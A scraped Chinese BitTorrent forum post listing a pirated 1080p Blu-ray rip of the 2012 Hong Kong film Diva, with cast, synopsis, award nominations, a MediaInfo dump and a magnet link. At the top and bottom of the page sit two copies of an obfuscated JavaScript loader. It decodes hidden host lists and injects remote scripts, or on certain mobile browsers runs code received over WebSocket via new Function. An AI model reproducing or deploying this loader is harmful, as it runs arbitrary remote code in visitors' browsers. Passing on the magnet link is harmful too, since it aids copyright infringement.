华丽之后[国粤语配音/中文字幕].Diva.2012.1080p.BluRay.x265.10bit.DTS.2Audio-bt9527.cc 6.58GB

版主小s 19天前 260

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 华丽之后 / 一天之后 / Diva

◎片 名 DIVA華麗之後

◎年 代 2012

◎产 地 中国香港

◎类 别 爱情 / 音乐

◎语 言 汉语普通话 / 粤语

◎上映日期 2012-08-16(中国香港/中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt2235184/

◎豆瓣评分 5.8/10 (6078人评价)

◎豆瓣链接 https://movie.douban.com/subject/6068517/

◎片 长 102分钟

◎导 演 麦曦茵 Heiward Mak (id:1274609)

◎编 剧 麦曦茵 Heiward Mak (id:1274609)

◎演 员 容祖儿 Joey Yung (id:1019539)

胡歌 Ge Hu (id:1274477)

林欣彤 Mag Lam (id:1317618)

陈家乐 Carlos Chan (id:1275972)

刘浩龙 Wilfred Lau (id:1275225)

冼色丽 Seli Xian (id:1275651)

岑珈其 Kaki Sham (id:1319715)

禤天扬 Huen Tin Yeung (id:1319716)

薛凯琪 Fiona Sit (id:1023827)

王敏奕 Venus Wong (id:1313355)

苏永康 William So Wing Hong (id:1155115)

惠英红 Kara Wai Ying Hung (id:1016847)

杨受成 Albert Yeung (id:1313455)

利雅博 Albert Lee (id:1326683)

李端娴 Veronica Lee (id:1328029)

李瑞娴 Veronica Lee (id:1446719)

叶绍麒 Yip Shiu Kei (id:1408645)

张兆康 Ahong Cheung (id:1366935)

张兆康 Ahong Cheung (id:1366935)

◎标 签 胡歌 / 容祖儿 / 香港 / 爱情 / 杜汶泽 / 麦曦茵 / 音乐 / 文艺

◎简 介

干劲十足的乐坛天后J(容祖儿 饰),每天马不停蹄地穿梭各类型工作,生活忙得喘不过气。当脱下华丽舞衣,卸下妆容后身心累得一片空白。但对事业充满斗心的她仍希望努力拓展国内市场,令事业再创高峰。在认识了盲人按摩师胡明(胡歌 饰)之后,对生活燃起爱火,对繁忙的工作开始疏离厌倦,经纪人Man(杜汶泽 饰)为保住J的天后位置,激烈反对。R(林欣彤 饰)一夜成名成为乐坛新贵,更被视为威胁 J 的实力新人,对演艺圈的奢靡复杂生活,既向往又惶恐,但却渐与平凡低薪的男友 K(陈家乐 饰) 距离越来越远,无法再维系这段感情……

左右她们命运的经纪人Man,利用种种卑鄙的手段,让J和R,从名不经传的爱唱歌的平凡女子,将她们培养成乐坛天后和天才新人,两个原本纯粹喜欢唱歌的女子,命运交错,经历数段刻骨感情的磨炼,重新确认自己的声音,找到自己的爱情。

◎获奖情况 (共6项)

第49届台北金马影展 (2012)

金马奖 最佳男配角(提名)

第32届香港电影金像奖 (2013)

最佳男配角(提名)

最佳原创电影音乐(提名)

最佳原创电影歌曲(提名)

第7届亚洲电影大奖 (2013)

最佳男配角(提名)

第13届华语电影传媒大奖 (2013)

最佳男配角

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 221172353430096112095054853122299328183 (0xA6643EEEFCD5A2329E947ED09994F6B7)

  4. Complete name : [email protected]v

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.57 GiB

  8. Duration : 1 h 41 min

  9. Overall bit rate : 9 239 kb/s

  10. Encoded date : UTC 2021-11-15 01:40:16

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 41 min

  20. Bit rate : 6 919 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 036 pixels

  23. Display aspect ratio : 1.85:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.145

  30. Stream size : 4.92 GiB (75%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=14.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=9 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1036 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio #1

  36. ID : 2

  37. ID in the original source medium : 4352 (0x1100)

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 41 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 16 bits

  49. Compression mode : Lossy

  50. Delay relative to video : 83 ms

  51. Stream size : 1.07 GiB (16%)

  52. Title : Cantonese

  53. Language : Chinese

  54. Default : Yes

  55. Forced : No

  56. Original source medium : Blu-ray


  57. Audio #2

  58. ID : 3

  59. ID in the original source medium : 4353 (0x1101)

  60. Format : E-AC-3

  61. Format/Info : Enhanced AC-3

  62. Commercial name : Dolby Digital Plus

  63. Format profile : Blu-ray Disc

  64. Codec ID : A_EAC3

  65. Duration : 1 h 41 min

  66. Bit rate mode : Constant

  67. Bit rate : 768 kb/s

  68. Channel(s) : 8 channels

  69. Channel layout : L R C LFE Ls Rs Lb Rb

  70. Sampling rate : 48.0 kHz

  71. Frame rate : 31.250 FPS (1536 SPF)

  72. Compression mode : Lossy

  73. Delay relative to video : 83 ms

  74. Stream size : 560 MiB (8%)

  75. Title : Mandarin

  76. Language : Chinese

  77. Service kind : Complete Main

  78. Default : No

  79. Forced : No

  80. Original source medium : Blu-ray


  81. Text #1

  82. ID : 4

  83. ID in the original source medium : 4612 (0x1204)

  84. Format : PGS

  85. Muxing mode : zlib

  86. Codec ID : S_HDMV/PGS

  87. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  88. Duration : 1 h 37 min

  89. Bit rate : 37.7 kb/s

  90. Count of elements : 2549

  91. Stream size : 26.3 MiB (0%)

  92. Title : chs

  93. Language : Chinese

  94. Default : Yes

  95. Forced : No

  96. Original source medium : Blu-ray


  97. Text #2

  98. ID : 5

  99. ID in the original source medium : 4611 (0x1203)

  100. Format : PGS

  101. Muxing mode : zlib

  102. Codec ID : S_HDMV/PGS

  103. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  104. Duration : 1 h 37 min

  105. Bit rate : 38.3 kb/s

  106. Count of elements : 2549

  107. Stream size : 26.7 MiB (0%)

  108. Title : cht

  109. Language : Chinese

  110. Default : No

  111. Forced : No

  112. Original source medium : Blu-ray


  113. Text #3

  114. ID : 6

  115. ID in the original source medium : 4613 (0x1205)

  116. Format : PGS

  117. Muxing mode : zlib

  118. Codec ID : S_HDMV/PGS

  119. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  120. Duration : 1 h 37 min

  121. Bit rate : 31.4 kb/s

  122. Count of elements : 2552

  123. Stream size : 21.9 MiB (0%)

  124. Title : eng

  125. Language : English

  126. Default : No

  127. Forced : No

  128. Original source medium : Blu-ray


  129. Menu

  130. 00:00:00.000 : 第 01 章

  131. 00:09:36.208 : 第 02 章

  132. 00:21:28.416 : 第 03 章

  133. 00:30:00.125 : 第 04 章

  134. 00:42:25.500 : 第 05 章

  135. 00:50:58.625 : 第 06 章

  136. 00:58:41.000 : 第 07 章

  137. 01:08:10.583 : 第 08 章

  138. 01:16:56.708 : 第 09 章

  139. 01:21:59.458 : 第 10 章

  140. 01:28:47.958 : 第 11 章

  141. 01:36:26.333 : 第 12 章




复制代码


TAGS 爱情 音乐

磁力链:
  • magnet:?xt=urn:btih:06B226FEA067A2176FC56EC4D89838B72DAAE3C3

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};